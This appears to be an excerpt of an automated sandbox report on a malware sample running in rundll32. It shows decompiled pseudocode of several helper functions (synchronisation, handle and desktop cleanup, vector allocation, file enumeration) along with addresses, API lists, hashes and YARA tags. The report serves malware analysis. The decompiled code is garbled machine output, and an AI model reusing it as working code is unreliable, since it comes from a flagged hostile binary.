                                                            • API ID: IncrementInterlockedTimetime
                                                            • String ID:
                                                            • API String ID: 159728177-0
                                                            • Opcode ID: 6911bd172f05b2e1d374718367b4ba786588c5985ac879ae3fb02bf9cac0927d
                                                            • Instruction ID: cd9b9c530db833bd57b3b17ce553b8b5d5f92c12a093a52095c39c5d19da9d3d
                                                            • Opcode Fuzzy Hash: 6911bd172f05b2e1d374718367b4ba786588c5985ac879ae3fb02bf9cac0927d
                                                            • Instruction Fuzzy Hash: 5A012975A00205AFD704DF69D818749BBF9FF89251F00421AE814C3610EBB4A850CFD1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E046520F0(intOrPtr* __ecx, intOrPtr _a4) {
                                                            				void* _t7;
                                                            				intOrPtr* _t9;
                                                            				intOrPtr _t12;
                                                            				struct _CRITICAL_SECTION* _t15;
                                                            
                                                            				_t12 = _a4;
                                                            				_t9 = __ecx;
                                                            				_t2 = _t12 + 0x54; // 0x54
                                                            				_t15 = _t2;
                                                            				EnterCriticalSection(_t15);
                                                            				if(_t12 == 0 ||  *((intOrPtr*)(_t12 + 0x30)) == 0) {
                                                            					LeaveCriticalSection(_t15);
                                                            					return 2;
                                                            				} else {
                                                            					SetLastError(0);
                                                            					_t7 =  *((intOrPtr*)( *_t9 + 0xdc))(_t12);
                                                            					LeaveCriticalSection(_t15);
                                                            					return _t7;
                                                            				}
                                                            			}







                                                            0x046520f6
                                                            0x046520f9
                                                            0x046520fb
                                                            0x046520fb
                                                            0x046520ff
                                                            0x04652107
                                                            0x0465213a
                                                            0x04652146
                                                            0x0465210f
                                                            0x04652111
                                                            0x0465211c
                                                            0x04652125
                                                            0x04652131
                                                            0x04652131

                                                            APIs
                                                            • RtlEnterCriticalSection.NTDLL(00000054), ref: 046520FF
                                                            • SetLastError.KERNEL32(00000000,?,80004005,80004005,?,?,04652885,?,?,?,00000000,0000009C,00000000,?,?,00000000), ref: 04652111
                                                            • RtlLeaveCriticalSection.NTDLL(00000054), ref: 04652125
                                                            • RtlLeaveCriticalSection.NTDLL(00000054), ref: 0465213A
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalSection$Leave$EnterErrorLast
                                                            • String ID:
                                                            • API String ID: 3832147951-0
                                                            • Opcode ID: 38177e629f31cfa67bb8f68fabf30c90efe30683ae570cb627922984ae3f64c5
                                                            • Instruction ID: 0409c3cfaa3a2b45df0af3a75386d9b1564608c7858396a609a04a3340e85991
                                                            • Opcode Fuzzy Hash: 38177e629f31cfa67bb8f68fabf30c90efe30683ae570cb627922984ae3f64c5
                                                            • Instruction Fuzzy Hash: 0DF01D36301214ABD3185A9AA84CAAAB76DEB95676F154036FB09C32009B75981586B1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E04636820(intOrPtr* __ecx) {
                                                            				int _t14;
                                                            				intOrPtr* _t16;
                                                            
                                                            				_t16 = __ecx;
                                                            				 *__ecx = 0x467df68;
                                                            				CloseDesktop( *(__ecx + 0xc));
                                                            				DeleteDC( *(_t16 + 0x18));
                                                            				ReleaseDC(0,  *(_t16 + 0x14));
                                                            				L04655B0F( *((intOrPtr*)(_t16 + 0x10)));
                                                            				L04655B0F( *((intOrPtr*)(_t16 + 0x88)));
                                                            				L04655B0F( *((intOrPtr*)(_t16 + 0x84)));
                                                            				 *_t16 = 0x467e8b0;
                                                            				_t14 = CloseHandle( *(_t16 + 8));
                                                            				 *_t16 = 0x467e8c0;
                                                            				return _t14;
                                                            			}





                                                            0x04636821
                                                            0x04636826
                                                            0x0463682c
                                                            0x04636835
                                                            0x04636840
                                                            0x04636849
                                                            0x04636854
                                                            0x0463685f
                                                            0x04636867
                                                            0x04636870
                                                            0x04636876
                                                            0x0463687d

                                                            APIs
                                                            • CloseDesktop.USER32(?,?,046367FB), ref: 0463682C
                                                            • DeleteDC.GDI32(?), ref: 04636835
                                                            • ReleaseDC.USER32(00000000,?), ref: 04636840
                                                            • CloseHandle.KERNEL32(?), ref: 04636870
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close$DeleteDesktopHandleRelease
                                                            • String ID:
                                                            • API String ID: 3596899788-0
                                                            • Opcode ID: 40ca2cd78760006a6d3badd95cfd8ddf286dbc3cff0b6f5dd0a0d3b4b2768bc1
                                                            • Instruction ID: 2df53be4ded47ea0eea13cc6b7ba3e15dc3e1ac3d19eff855a245467fb088d14
                                                            • Opcode Fuzzy Hash: 40ca2cd78760006a6d3badd95cfd8ddf286dbc3cff0b6f5dd0a0d3b4b2768bc1
                                                            • Instruction Fuzzy Hash: 19F01531100701EFEB262F60ED0CA46BBB1FF04205F00592DE99B51574FB366894EB15
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 65%
                                                            			E046406C0(signed int _a4, signed int _a8, char _a12) {
                                                            				intOrPtr* _v0;
                                                            				intOrPtr _v12;
                                                            				char _v20;
                                                            				intOrPtr _v24;
                                                            				intOrPtr _v28;
                                                            				signed int _v32;
                                                            				intOrPtr _v36;
                                                            				signed int _v40;
                                                            				signed int _v44;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				void* __ebp;
                                                            				signed int _t75;
                                                            				signed int _t79;
                                                            				intOrPtr* _t86;
                                                            				unsigned int _t115;
                                                            				signed int _t117;
                                                            				signed int _t118;
                                                            				signed int _t122;
                                                            				signed int _t140;
                                                            				intOrPtr _t142;
                                                            				signed int* _t146;
                                                            				signed int* _t148;
                                                            				signed int _t149;
                                                            				signed int _t158;
                                                            				void* _t160;
                                                            				void* _t161;
                                                            				signed int _t162;
                                                            				signed int _t164;
                                                            				signed int _t167;
                                                            				signed int _t169;
                                                            				signed int _t175;
                                                            				signed int _t182;
                                                            				signed int _t186;
                                                            				void* _t187;
                                                            				signed int _t189;
                                                            				void* _t191;
                                                            				signed int _t193;
                                                            				unsigned int _t195;
                                                            				signed int _t196;
                                                            				signed int _t199;
                                                            				intOrPtr _t200;
                                                            				intOrPtr _t205;
                                                            
                                                            				_t75 = _a4;
                                                            				if(_t75 != 0) {
                                                            					__eflags = _t75 - 0x3fffffff;
                                                            					if(__eflags > 0) {
                                                            						E04656A13(__eflags);
                                                            						goto L8;
                                                            					} else {
                                                            						_t140 = _t75 << 2;
                                                            						__eflags = _t140 - 0x1000;
                                                            						if(__eflags < 0) {
                                                            							return L04655B14(_t187, __eflags, _t140);
                                                            						} else {
                                                            							_t2 = _t140 + 0x23; // 0x23
                                                            							_t148 = _t2;
                                                            							__eflags = _t148 - _t140;
                                                            							if(__eflags <= 0) {
                                                            								L8:
                                                            								E04656A13(__eflags);
                                                            								asm("int3");
                                                            								asm("int3");
                                                            								asm("int3");
                                                            								asm("int3");
                                                            								asm("int3");
                                                            								_push(0xffffffff);
                                                            								_push(0x4672e80);
                                                            								_push( *[fs:0x0]);
                                                            								_t200 = _t199 - 0x18;
                                                            								_push(_t187);
                                                            								_t79 =  *0x4684008; // 0xd355be4e
                                                            								_push(_t79 ^ _t199);
                                                            								 *[fs:0x0] =  &_v20;
                                                            								_v24 = _t200;
                                                            								_t146 = _t148;
                                                            								_t149 = _a4;
                                                            								_v44 = _t149 -  *_t146 >> 2;
                                                            								_t182 = _a8;
                                                            								__eflags = _t182;
                                                            								if(_t182 != 0) {
                                                            									_t189 = _t146[2];
                                                            									_t169 = _t146[1];
                                                            									_a8 = _t169;
                                                            									__eflags = _t189 - _t169 >> 2 - _t182;
                                                            									if(_t189 - _t169 >> 2 >= _t182) {
                                                            										_push(_t149);
                                                            										_push(_a4);
                                                            										_push(_t149);
                                                            										__eflags = _t169 - _t149 >> 2 - _t182;
                                                            										_a12 =  *_a12;
                                                            										if(_t169 - _t149 >> 2 >= _t182) {
                                                            											_t191 = _t169 - (_t182 << 2);
                                                            											_t146[1] = E04640A00(_t191, _t169, _t169);
                                                            											__eflags = _a8 - _t191 - _a4;
                                                            											E0465D060(_a8 - _t191 - _a4, _a4, _t191 - _a4);
                                                            											E04640950(_a4, (_t182 << 2) + _a4,  &_a12);
                                                            										} else {
                                                            											_t193 = _t182 * 4;
                                                            											E04640A00(_t149, _t169, _t193 + _t149);
                                                            											_v12 = 2;
                                                            											_push(_a4);
                                                            											_push(_t146[1]);
                                                            											E04640990(_t146[1], _t182 - (_t146[1] - _a4 >> 2),  &_a12);
                                                            											_v12 = 0xffffffff;
                                                            											_t146[1] = _t146[1] + _t193;
                                                            											E04640950(_a4, _t146[1] - _t193,  &_a12);
                                                            										}
                                                            									} else {
                                                            										_t158 =  *_t146;
                                                            										_t175 = _t169 - _t158 >> 2;
                                                            										__eflags = 0x3fffffff - _t175 - _t182;
                                                            										if(__eflags < 0) {
                                                            											_push("vector<T> too long");
                                                            											E04656A30(__eflags);
                                                            										}
                                                            										_a8 = _t175 + _t182;
                                                            										_t195 = _t189 - _t158 >> 2;
                                                            										_t115 = _t195 >> 1;
                                                            										__eflags = 0x3fffffff - _t115 - _t195;
                                                            										_t160 =  >=  ? _t115 + _t195 : 0;
                                                            										_t117 = _a8;
                                                            										__eflags = _t160 - _t117;
                                                            										_t118 =  >=  ? _t160 : _t117;
                                                            										_a8 = _t118;
                                                            										_v36 = _t118;
                                                            										_push(_t118);
                                                            										_t196 = E046406C0();
                                                            										_v40 = _t196;
                                                            										_t122 = _a4 -  *_t146 >> 2;
                                                            										_v32 = _t122;
                                                            										_v12 = 0;
                                                            										_t161 = _t196 + _t122 * 4;
                                                            										_push(_a4);
                                                            										_push(_t161);
                                                            										E04640990(_t161, _t182, _a12);
                                                            										_v28 = 1;
                                                            										_t205 = _t200 + 8;
                                                            										_a12 = _t205;
                                                            										_push(_a4);
                                                            										_push(_t161);
                                                            										_t162 =  *_t146;
                                                            										E04640A00(_t162, _a4, _t196);
                                                            										_v28 = 2;
                                                            										_a12 = _t205 + 0xc;
                                                            										_push(_a4);
                                                            										_push(_t162);
                                                            										_t180 = _t146[1];
                                                            										E04640A00(_a4, _t146[1], _t196 + (_v32 + _t182) * 4);
                                                            										_v12 = 0xffffffff;
                                                            										_t164 =  *_t146;
                                                            										_t186 = _t182 + (_t146[1] - _t164 >> 2);
                                                            										__eflags = _t164;
                                                            										if(_t164 != 0) {
                                                            											__eflags = _t146[2] - _t164;
                                                            											L046403B0(_t146, _t180, _t186, _t196, _t164, _t146[2] - _t164 >> 2);
                                                            										}
                                                            										_t146[2] = _t196 + _a8 * 4;
                                                            										_t146[1] = _t196 + _t186 * 4;
                                                            										 *_t146 = _t196;
                                                            									}
                                                            								}
                                                            								_t86 = _v0;
                                                            								 *_t86 =  *_t146 + _v44 * 4;
                                                            								 *[fs:0x0] = _v20;
                                                            								return _t86;
                                                            							} else {
                                                            								_t142 = L04655B14(_t187, __eflags, _t148);
                                                            								_t3 = _t142 + 0x23; // 0x23
                                                            								_t167 = _t3 & 0xffffffe0;
                                                            								__eflags = _t167;
                                                            								 *((intOrPtr*)(_t167 - 4)) = _t142;
                                                            								return _t167;
                                                            							}
                                                            						}
                                                            					}
                                                            				} else {
                                                            					return 0;
                                                            				}
                                                            			}















































                                                            0x046406c3
                                                            0x046406c8
                                                            0x046406d2
                                                            0x046406d7
                                                            0x04640711
                                                            0x00000000
                                                            0x046406d9
                                                            0x046406d9
                                                            0x046406dc
                                                            0x046406e1
                                                            0x0464070e
                                                            0x046406e3
                                                            0x046406e3
                                                            0x046406e3
                                                            0x046406e6
                                                            0x046406e8
                                                            0x04640716
                                                            0x04640716
                                                            0x0464071b
                                                            0x0464071c
                                                            0x0464071d
                                                            0x0464071e
                                                            0x0464071f
                                                            0x04640723
                                                            0x04640725
                                                            0x04640730
                                                            0x04640731
                                                            0x04640735
                                                            0x04640737
                                                            0x0464073e
                                                            0x04640742
                                                            0x04640748
                                                            0x0464074b
                                                            0x0464074d
                                                            0x04640757
                                                            0x0464075a
                                                            0x0464075d
                                                            0x0464075f
                                                            0x04640765
                                                            0x04640768
                                                            0x0464076b
                                                            0x04640775
                                                            0x04640777
                                                            0x0464088f
                                                            0x04640890
                                                            0x04640893
                                                            0x04640894
                                                            0x0464089b
                                                            0x0464089e
                                                            0x046408fe
                                                            0x04640908
                                                            0x04640915
                                                            0x04640918
                                                            0x04640927
                                                            0x046408a0
                                                            0x046408a0
                                                            0x046408ab
                                                            0x046408b3
                                                            0x046408c7
                                                            0x046408ca
                                                            0x046408d1
                                                            0x046408d9
                                                            0x046408e0
                                                            0x046408ef
                                                            0x046408f4
                                                            0x0464077d
                                                            0x0464077d
                                                            0x04640781
                                                            0x0464078b
                                                            0x0464078d
                                                            0x0464078f
                                                            0x04640794
                                                            0x04640794
                                                            0x0464079c
                                                            0x046407a1
                                                            0x046407a6
                                                            0x046407b3
                                                            0x046407b5
                                                            0x046407b8
                                                            0x046407bb
                                                            0x046407bd
                                                            0x046407c0
                                                            0x046407c3
                                                            0x046407c6
                                                            0x046407cc
                                                            0x046407ce
                                                            0x046407d6
                                                            0x046407d9
                                                            0x046407dc
                                                            0x046407e3
                                                            0x046407e6
                                                            0x046407e9
                                                            0x046407ef
                                                            0x046407f4
                                                            0x046407fb
                                                            0x046407fe
                                                            0x04640801
                                                            0x04640804
                                                            0x04640809
                                                            0x0464080b
                                                            0x04640810
                                                            0x04640822
                                                            0x04640825
                                                            0x04640828
                                                            0x0464082a
                                                            0x04640830
                                                            0x04640838
                                                            0x0464083f
                                                            0x04640849
                                                            0x0464084b
                                                            0x0464084d
                                                            0x04640852
                                                            0x04640859
                                                            0x04640859
                                                            0x04640864
                                                            0x0464086a
                                                            0x0464086d
                                                            0x0464086d
                                                            0x04640777
                                                            0x04640937
                                                            0x0464093a
                                                            0x0464093f
                                                            0x0464094d
                                                            0x046406ea
                                                            0x046406eb
                                                            0x046406f3
                                                            0x046406f6
                                                            0x046406f6
                                                            0x046406f9
                                                            0x046406ff
                                                            0x046406ff
                                                            0x046406e8
                                                            0x046406e1
                                                            0x046406ca
                                                            0x046406cf
                                                            0x046406cf

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: vector<T> too long
                                                            • API String ID: 0-3788999226
                                                            • Opcode ID: eec1a028044b83691f7262614492b16cf9fed5a83c69ed92f1955effe408cdf7
                                                            • Instruction ID: 8fd0f67e75b43256ac8ea68af923e86c81d385a88e57ba26b7d85d28b57149d1
                                                            • Opcode Fuzzy Hash: eec1a028044b83691f7262614492b16cf9fed5a83c69ed92f1955effe408cdf7
                                                            • Instruction Fuzzy Hash: 6A5181B1A002199FDF18CF68C891AAE77E5EB88310F14862DE919DB384E731F910CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 72%
                                                            			E04669999(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, intOrPtr _a12) {
                                                            				intOrPtr _v0;
                                                            				char _v6;
                                                            				char _v8;
                                                            				signed int _v12;
                                                            				signed int _v16;
                                                            				signed int _v20;
                                                            				signed int _v24;
                                                            				signed int _v28;
                                                            				signed int _v36;
                                                            				intOrPtr* _v64;
                                                            				intOrPtr _v96;
                                                            				intOrPtr* _v100;
                                                            				CHAR* _v104;
                                                            				signed int _v116;
                                                            				char _v290;
                                                            				signed int _v291;
                                                            				struct _WIN32_FIND_DATAA _v336;
                                                            				union _FINDEX_INFO_LEVELS _v340;
                                                            				signed int _v344;
                                                            				signed int _v348;
                                                            				intOrPtr _v440;
                                                            				intOrPtr* _t80;
                                                            				signed int _t82;
                                                            				signed int _t87;
                                                            				signed int _t91;
                                                            				signed int _t93;
                                                            				signed int _t95;
                                                            				signed int _t96;
                                                            				signed int _t100;
                                                            				signed int _t103;
                                                            				signed int _t108;
                                                            				intOrPtr _t113;
                                                            				signed char _t115;
                                                            				union _FINDEX_INFO_LEVELS _t123;
                                                            				signed int _t128;
                                                            				signed int _t131;
                                                            				void* _t137;
                                                            				void* _t139;
                                                            				signed int _t140;
                                                            				signed int _t143;
                                                            				signed int _t145;
                                                            				signed int _t147;
                                                            				signed int* _t148;
                                                            				signed int _t151;
                                                            				void* _t154;
                                                            				CHAR* _t155;
                                                            				char _t158;
                                                            				char _t160;
                                                            				intOrPtr* _t163;
                                                            				void* _t164;
                                                            				intOrPtr* _t165;
                                                            				signed int _t167;
                                                            				void* _t169;
                                                            				intOrPtr* _t170;
                                                            				signed int _t174;
                                                            				signed int _t178;
                                                            				signed int _t179;
                                                            				intOrPtr* _t184;
                                                            				void* _t193;
                                                            				intOrPtr _t194;
                                                            				signed int _t196;
                                                            				signed int _t197;
                                                            				signed int _t199;
                                                            				signed int _t200;
                                                            				signed int _t202;
                                                            				union _FINDEX_INFO_LEVELS _t203;
                                                            				signed int _t208;
                                                            				signed int _t210;
                                                            				signed int _t211;
                                                            				void* _t213;
                                                            				intOrPtr _t214;
                                                            				void* _t215;
                                                            				signed int _t219;
                                                            				void* _t221;
                                                            				signed int _t222;
                                                            				void* _t223;
                                                            				void* _t224;
                                                            				void* _t225;
                                                            				signed int _t226;
                                                            				void* _t227;
                                                            				void* _t228;
                                                            
                                                            				_t80 = _a8;
                                                            				_t224 = _t223 - 0x20;
                                                            				if(_t80 != 0) {
                                                            					_t208 = _a4;
                                                            					_t160 = 0;
                                                            					 *_t80 = 0;
                                                            					_t199 = 0;
                                                            					_t151 = 0;
                                                            					_v36 = 0;
                                                            					_v336.cAlternateFileName = 0;
                                                            					_v28 = 0;
                                                            					__eflags =  *_t208;
                                                            					if( *_t208 == 0) {
                                                            						L9:
                                                            						_v12 = _v12 & 0x00000000;
                                                            						_t82 = _t151 - _t199;
                                                            						_v8 = _t160;
                                                            						_t191 = (_t82 >> 2) + 1;
                                                            						__eflags = _t151 - _t199;
                                                            						_v16 = (_t82 >> 2) + 1;
                                                            						asm("sbb esi, esi");
                                                            						_t210 =  !_t208 & _t82 + 0x00000003 >> 0x00000002;
                                                            						__eflags = _t210;
                                                            						if(_t210 != 0) {
                                                            							_t197 = _t199;
                                                            							_t158 = _t160;
                                                            							do {
                                                            								_t184 =  *_t197;
                                                            								_t17 = _t184 + 1; // 0x1
                                                            								_v8 = _t17;
                                                            								do {
                                                            									_t143 =  *_t184;
                                                            									_t184 = _t184 + 1;
                                                            									__eflags = _t143;
                                                            								} while (_t143 != 0);
                                                            								_t158 = _t158 + 1 + _t184 - _v8;
                                                            								_t197 = _t197 + 4;
                                                            								_t145 = _v12 + 1;
                                                            								_v12 = _t145;
                                                            								__eflags = _t145 - _t210;
                                                            							} while (_t145 != _t210);
                                                            							_t191 = _v16;
                                                            							_v8 = _t158;
                                                            							_t151 = _v336.cAlternateFileName;
                                                            						}
                                                            						_t211 = E04660E6E(_t191, _v8, 1);
                                                            						_t225 = _t224 + 0xc;
                                                            						__eflags = _t211;
                                                            						if(_t211 != 0) {
                                                            							_t87 = _t211 + _v16 * 4;
                                                            							_v20 = _t87;
                                                            							_t192 = _t87;
                                                            							_v16 = _t87;
                                                            							__eflags = _t199 - _t151;
                                                            							if(_t199 == _t151) {
                                                            								L23:
                                                            								_t200 = 0;
                                                            								__eflags = 0;
                                                            								 *_a8 = _t211;
                                                            								goto L24;
                                                            							} else {
                                                            								_t93 = _t211 - _t199;
                                                            								__eflags = _t93;
                                                            								_v24 = _t93;
                                                            								do {
                                                            									_t163 =  *_t199;
                                                            									_v12 = _t163 + 1;
                                                            									do {
                                                            										_t95 =  *_t163;
                                                            										_t163 = _t163 + 1;
                                                            										__eflags = _t95;
                                                            									} while (_t95 != 0);
                                                            									_t164 = _t163 - _v12;
                                                            									_t35 = _t164 + 1; // 0x1
                                                            									_t96 = _t35;
                                                            									_push(_t96);
                                                            									_v12 = _t96;
                                                            									_t100 = E0466CC4B(_t164, _t192, _v20 - _t192 + _v8,  *_t199);
                                                            									_t225 = _t225 + 0x10;
                                                            									__eflags = _t100;
                                                            									if(_t100 != 0) {
                                                            										_push(0);
                                                            										_push(0);
                                                            										_push(0);
                                                            										_push(0);
                                                            										_push(0);
                                                            										E0465EF13();
                                                            										asm("int3");
                                                            										_t221 = _t225;
                                                            										_push(_t164);
                                                            										_t165 = _v64;
                                                            										_t193 = _t165 + 1;
                                                            										do {
                                                            											_t103 =  *_t165;
                                                            											_t165 = _t165 + 1;
                                                            											__eflags = _t103;
                                                            										} while (_t103 != 0);
                                                            										_push(_t199);
                                                            										_t202 = _a8;
                                                            										_t167 = _t165 - _t193 + 1;
                                                            										_v12 = _t167;
                                                            										__eflags = _t167 - (_t103 | 0xffffffff) - _t202;
                                                            										if(_t167 <= (_t103 | 0xffffffff) - _t202) {
                                                            											_push(_t151);
                                                            											_t154 = _t202 + 1 + _t167;
                                                            											_t213 = E04668535(_t167, _t154, 1);
                                                            											_t169 = _t211;
                                                            											__eflags = _t202;
                                                            											if(_t202 == 0) {
                                                            												L34:
                                                            												_push(_v12);
                                                            												_t154 = _t154 - _t202;
                                                            												_t108 = E0466CC4B(_t169, _t213 + _t202, _t154, _v0);
                                                            												_t226 = _t225 + 0x10;
                                                            												__eflags = _t108;
                                                            												if(__eflags != 0) {
                                                            													goto L37;
                                                            												} else {
                                                            													_t137 = E04669D68(_a12, __eflags, _t213);
                                                            													E046684AD(0);
                                                            													_t139 = _t137;
                                                            													goto L36;
                                                            												}
                                                            											} else {
                                                            												_push(_t202);
                                                            												_t140 = E0466CC4B(_t169, _t213, _t154, _a4);
                                                            												_t226 = _t225 + 0x10;
                                                            												__eflags = _t140;
                                                            												if(_t140 != 0) {
                                                            													L37:
                                                            													_push(0);
                                                            													_push(0);
                                                            													_push(0);
                                                            													_push(0);
                                                            													_push(0);
                                                            													E0465EF13();
                                                            													asm("int3");
                                                            													_push(_t221);
                                                            													_t222 = _t226;
                                                            													_t227 = _t226 - 0x150;
                                                            													_v116 =  *0x4684008 ^ _t222;
                                                            													_t170 = _v100;
                                                            													_push(_t154);
                                                            													_t155 = _v104;
                                                            													_push(_t213);
                                                            													_t214 = _v96;
                                                            													_push(_t202);
                                                            													_v440 = _t214;
                                                            													while(1) {
                                                            														__eflags = _t170 - _t155;
                                                            														if(_t170 == _t155) {
                                                            															break;
                                                            														}
                                                            														_t113 =  *_t170;
                                                            														__eflags = _t113 - 0x2f;
                                                            														if(_t113 != 0x2f) {
                                                            															__eflags = _t113 - 0x5c;
                                                            															if(_t113 != 0x5c) {
                                                            																__eflags = _t113 - 0x3a;
                                                            																if(_t113 != 0x3a) {
                                                            																	_t170 = E0466CCA0(_t155, _t170);
                                                            																	continue;
                                                            																}
                                                            															}
                                                            														}
                                                            														break;
                                                            													}
                                                            													_t194 =  *_t170;
                                                            													__eflags = _t194 - 0x3a;
                                                            													if(_t194 != 0x3a) {
                                                            														L48:
                                                            														_t203 = 0;
                                                            														__eflags = _t194 - 0x2f;
                                                            														if(_t194 == 0x2f) {
                                                            															L52:
                                                            															_t115 = 1;
                                                            															__eflags = 1;
                                                            														} else {
                                                            															__eflags = _t194 - 0x5c;
                                                            															if(_t194 == 0x5c) {
                                                            																goto L52;
                                                            															} else {
                                                            																__eflags = _t194 - 0x3a;
                                                            																if(_t194 == 0x3a) {
                                                            																	goto L52;
                                                            																} else {
                                                            																	_t115 = 0;
                                                            																}
                                                            															}
                                                            														}
                                                            														asm("sbb eax, eax");
                                                            														_v344 =  ~(_t115 & 0x000000ff) & _t170 - _t155 + 0x00000001;
                                                            														E0465DEA0(_t203,  &_v336, _t203, 0x140);
                                                            														_t228 = _t227 + 0xc;
                                                            														_t215 = FindFirstFileExA(_t155, _t203,  &_v336, _t203, _t203, _t203);
                                                            														_t123 = _v340;
                                                            														__eflags = _t215 - 0xffffffff;
                                                            														if(_t215 != 0xffffffff) {
                                                            															_t174 =  *((intOrPtr*)(_t123 + 4)) -  *_t123;
                                                            															__eflags = _t174;
                                                            															_v348 = _t174 >> 2;
                                                            															do {
                                                            																__eflags = _v336.cFileName - 0x2e;
                                                            																if(_v336.cFileName != 0x2e) {
                                                            																	L65:
                                                            																	_push(_t123);
                                                            																	_push(_v344);
                                                            																	_t123 =  &(_v336.cFileName);
                                                            																	_push(_t155);
                                                            																	_push(_t123);
                                                            																	L28();
                                                            																	_t228 = _t228 + 0x10;
                                                            																	__eflags = _t123;
                                                            																	if(_t123 != 0) {
                                                            																		goto L55;
                                                            																	} else {
                                                            																		goto L66;
                                                            																	}
                                                            																} else {
                                                            																	_t178 = _v291;
                                                            																	__eflags = _t178;
                                                            																	if(_t178 == 0) {
                                                            																		goto L66;
                                                            																	} else {
                                                            																		__eflags = _t178 - 0x2e;
                                                            																		if(_t178 != 0x2e) {
                                                            																			goto L65;
                                                            																		} else {
                                                            																			__eflags = _v290;
                                                            																			if(_v290 == 0) {
                                                            																				goto L66;
                                                            																			} else {
                                                            																				goto L65;
                                                            																			}
                                                            																		}
                                                            																	}
                                                            																}
                                                            																goto L59;
                                                            																L66:
                                                            																_t128 = FindNextFileA(_t215,  &_v336);
                                                            																__eflags = _t128;
                                                            																_t123 = _v340;
                                                            															} while (_t128 != 0);
                                                            															_t195 =  *_t123;
                                                            															_t179 = _v348;
                                                            															_t131 =  *((intOrPtr*)(_t123 + 4)) -  *_t123 >> 2;
                                                            															__eflags = _t179 - _t131;
                                                            															if(_t179 != _t131) {
                                                            																E0466C800(_t155, _t203, _t215, _t195 + _t179 * 4, _t131 - _t179, 4, E04669981);
                                                            															}
                                                            														} else {
                                                            															_push(_t123);
                                                            															_push(_t203);
                                                            															_push(_t203);
                                                            															_push(_t155);
                                                            															L28();
                                                            															L55:
                                                            															_t203 = _t123;
                                                            														}
                                                            														__eflags = _t215 - 0xffffffff;
                                                            														if(_t215 != 0xffffffff) {
                                                            															FindClose(_t215);
                                                            														}
                                                            													} else {
                                                            														__eflags = _t170 -  &(_t155[1]);
                                                            														if(_t170 ==  &(_t155[1])) {
                                                            															goto L48;
                                                            														} else {
                                                            															_push(_t214);
                                                            															_push(0);
                                                            															_push(0);
                                                            															_push(_t155);
                                                            															L28();
                                                            														}
                                                            													}
                                                            													L59:
                                                            													__eflags = _v16 ^ _t222;
                                                            													return E04655AFE(_v16 ^ _t222);
                                                            												} else {
                                                            													goto L34;
                                                            												}
                                                            											}
                                                            										} else {
                                                            											_t139 = 0xc;
                                                            											L36:
                                                            											return _t139;
                                                            										}
                                                            									} else {
                                                            										goto L22;
                                                            									}
                                                            									goto L69;
                                                            									L22:
                                                            									_t196 = _v16;
                                                            									 *((intOrPtr*)(_v24 + _t199)) = _t196;
                                                            									_t199 = _t199 + 4;
                                                            									_t192 = _t196 + _v12;
                                                            									_v16 = _t196 + _v12;
                                                            									__eflags = _t199 - _t151;
                                                            								} while (_t199 != _t151);
                                                            								goto L23;
                                                            							}
                                                            						} else {
                                                            							_t200 = _t199 | 0xffffffff;
                                                            							L24:
                                                            							E046684AD(0);
                                                            							goto L25;
                                                            						}
                                                            					} else {
                                                            						while(1) {
                                                            							_v8 = 0x3f2a;
                                                            							_v6 = _t160;
                                                            							_t147 = E0466CC60( *_t208,  &_v8);
                                                            							__eflags = _t147;
                                                            							if(_t147 != 0) {
                                                            								_push( &_v36);
                                                            								_push(_t147);
                                                            								_push( *_t208);
                                                            								L38();
                                                            								_t224 = _t224 + 0xc;
                                                            							} else {
                                                            								_t147 =  &_v36;
                                                            								_push(_t147);
                                                            								_push(0);
                                                            								_push(0);
                                                            								_push( *_t208);
                                                            								L28();
                                                            								_t224 = _t224 + 0x10;
                                                            							}
                                                            							_t200 = _t147;
                                                            							__eflags = _t200;
                                                            							if(_t200 != 0) {
                                                            								break;
                                                            							}
                                                            							_t208 = _t208 + 4;
                                                            							_t160 = 0;
                                                            							__eflags =  *_t208;
                                                            							if( *_t208 != 0) {
                                                            								continue;
                                                            							} else {
                                                            								_t151 = _v336.cAlternateFileName;
                                                            								_t199 = _v36;
                                                            								goto L9;
                                                            							}
                                                            							goto L69;
                                                            						}
                                                            						L25:
                                                            						E04669D43( &_v36);
                                                            						_t91 = _t200;
                                                            						goto L26;
                                                            					}
                                                            				} else {
                                                            					_t148 = E04661772();
                                                            					_t219 = 0x16;
                                                            					 *_t148 = _t219;
                                                            					E0465EEE6();
                                                            					_t91 = _t219;
                                                            					L26:
                                                            					return _t91;
                                                            				}
                                                            				L69:
                                                            			}




















































































                                                            0x0466999e
                                                            0x046699a1
                                                            0x046699a7
                                                            0x046699bf
                                                            0x046699c2
                                                            0x046699c6
                                                            0x046699c8
                                                            0x046699ca
                                                            0x046699cc
                                                            0x046699cf
                                                            0x046699d2
                                                            0x046699d5
                                                            0x046699d7
                                                            0x04669a2f
                                                            0x04669a2f
                                                            0x04669a35
                                                            0x04669a37
                                                            0x04669a42
